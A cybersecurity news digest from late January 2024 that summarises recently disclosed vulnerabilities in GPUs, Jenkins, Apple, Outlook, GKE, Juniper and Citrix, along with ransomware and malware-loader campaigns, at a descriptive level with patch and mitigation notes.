The HighPoint Security Hub – Jan 31, 2024

Navigating the ever-evolving landscape of cyber threats is a constant challenge. “The Security Hub” is here to make it easier, offering a succinct overview of the most pressing developments from the past two weeks.

This week, critical updates include patches for the LeftoverLocals GPU vulnerability affecting Apple and AMD products, and the emergence of sophisticated cyber threats like the Kasseika ransomware employing BYOVD attacks. Apple, Jenkins, and major tech firms address significant security flaws, amidst rising concerns over malware loader attacks and vulnerabilities in widely-used tools and platforms.

Global Developments

1. Researchers at Trail of Bits uncovered the LeftoverLocals vulnerability (CVE-2023-4969) affecting GPUs in Apple, AMD, Qualcomm, and Imagination Technologies products. The flaw allows local attackers to access sensitive data from applications due to insufficient process memory isolation. While Qualcomm and Apple have released patches, AMD plans mitigations in March 2024. Left unaddressed, the vulnerability poses a serious threat to GPUs’ broader applications, including AI. Read more.
2. Jenkins, an open-source automation tool, has resolved nine security flaws, including a critical CVE-2024-23897. This arbitrary file read vulnerability through the built-in CLI could lead to remote code execution. An attacker could read arbitrary files on the Jenkins controller system, while those with “Overall/Read” permission can access entire files, others can read the first three lines. This flaw could be used to extract binary secrets, potentially enabling remote code execution, CSRF protection bypass, and more. Read more.
3. Apple has issued security updates for iOS, iPadOS, macOS, tvOS, and Safari, addressing a zero-day vulnerability actively exploited in the wild. The flaw, a type of confusion bug in the WebKit browser engine, could lead to arbitrary code execution when processing malicious web content. While Apple improved checks to fix the issue, the company acknowledged awareness of possible exploitation. This marks the first zero-day patched by Apple in 2024. Read more.

Commonly Used Tools and Gadgets

1. Data security firm Varonis has disclosed a new vulnerability and three attack methods by exploiting Microsoft Outlook and two Windows programs. While Microsoft addressed one in its December 2023 Patch Tuesday updates, the other vulnerabilities remain unpatched. Varonis demonstrated that attackers could exploit the Outlook vulnerability by sending a specially crafted email with specific headers, leading to NTLM hash exposure during the authentication process. The remaining attack methods involve abusing the Windows Performance Analyzer and Windows File Explorer, posing potential risks for unauthorized access and password cracking. Read more.
2. A critical vulnerability named Sys:All has been discovered in Google Kubernetes Engine (GKE), affecting an estimated 250,000 active clusters. Cloud security firm Orca revealed that the flaw results from a misconception regarding the system: authenticated group in GKE, which includes any Google-authenticated account, not just verified and deterministic identities. Exploiting this misconfiguration, an external threat actor with a Google account could seize control of a GKE cluster, potentially leading to various malicious activities. Google has responded by blocking the system: authenticated group from the cluster-admin role in GKE versions 1.28 and later. Read more.
3. Juniper Networks has released out-of-band updates addressing high-severity flaws in SRX Series and EX Series, impacting all Junos OS versions. Discovered by watchTowr Labs, the vulnerabilities involve a missing authentication flaw and a cross-site scripting (XSS) vulnerability, posing a risk of exposure to sensitive configuration information and arbitrary command execution. The fixes are provided in specified releases for each CVE. As a temporary mitigation, Juniper advises users to disable J-Web or restrict access to trusted hosts until the updates are deployed. Read more.
4. Citrix has warned of two zero-day vulnerabilities in NetScaler ADC and NetScaler Gateway actively exploited in the wild. One allows authenticated remote code execution on the Management Interface, while the other leads to denial-of-service. Affected versions include NetScaler ADC and NetScaler Gateway 14.1, 13.1, 13.0, and 12.1. Users of version 12.1 are advised to upgrade to a supported version and avoid exposing the management interface to the internet. In a separate alert, VMware disclosed a critical access control flaw in Aria Automation, urging an upgrade to version 8.16. Read more.

Malware and Ransomware

1. Ransomware group Kasseika is employing bring-your-own-vulnerable-driver (BYOVD) attacks, terminating antivirus processes using the Martini driver. The attack involves phishing links for initial access, use of remote administration tools, and exploitation of PsExec for execution. Kasseika utilizes the Martini.sys driver to disable security tools, employing a KILLAV mechanism for defense evasion. The ransomware, based on BlackMatter source code, then encrypts files using the ChaCha20 algorithm. Read more.
2. A new threat actor has been discovered using a sophisticated downloader named “CherryLoader” to achieve admin-level access on targeted systems. CherryLoader, written in Golang, masquerades as the legitimate “Cherrytree” note-taking software. It features a modular design, allowing the threat actor to seamlessly swap payloads without code recompilation. In observed intrusions, CherryLoader was used to deploy two publicly available privilege escalation tools, PrintSpoofer and JuicyPotatoNG. The latter exploits the “Printer Bug” to manipulate Active Directory, while the former is a Windows privilege escalation tool. The attackers used these tools to gain high-level access, dropping a batch file script called user.bat for persistence and anti-analysis functions. Read more.
3. ZLoader malware has re-emerged nearly two years after a takedown. This new version includes RSA encryption, an updated domain generation algorithm, and 64-bit Windows OS compatibility. ZLoader, initially a Zeus banking trojan offshoot, suffered a setback in 2022 after a takedown led by Microsoft. The latest versions resist analysis through junk code, string obfuscation, and specific filenames for execution. Despite a temporary halt in activity, the threat group behind ZLoader is now back, posing a potential risk for new ransomware attacks. Read more.
4. Malicious packages on the Python Package Index (PyPI) repository have been found delivering WhiteSnake Stealer malware on Windows systems. Uploaded by a threat actor named “WS,” packages like nigpal, figflix, and seGMM include Base64-encoded source code that drops the final malicious payload upon installation. WhiteSnake Stealer, targeting Windows users, has anti-VM mechanisms, communicates via Tor, and steals information, including from web browsers, cryptocurrency wallets, and various applications. Some rogue packages also feature clipper functionality to overwrite clipboard content for unauthorized transactions. The findings highlight a single malware author disseminating multiple info-stealing packages on PyPI. Read more.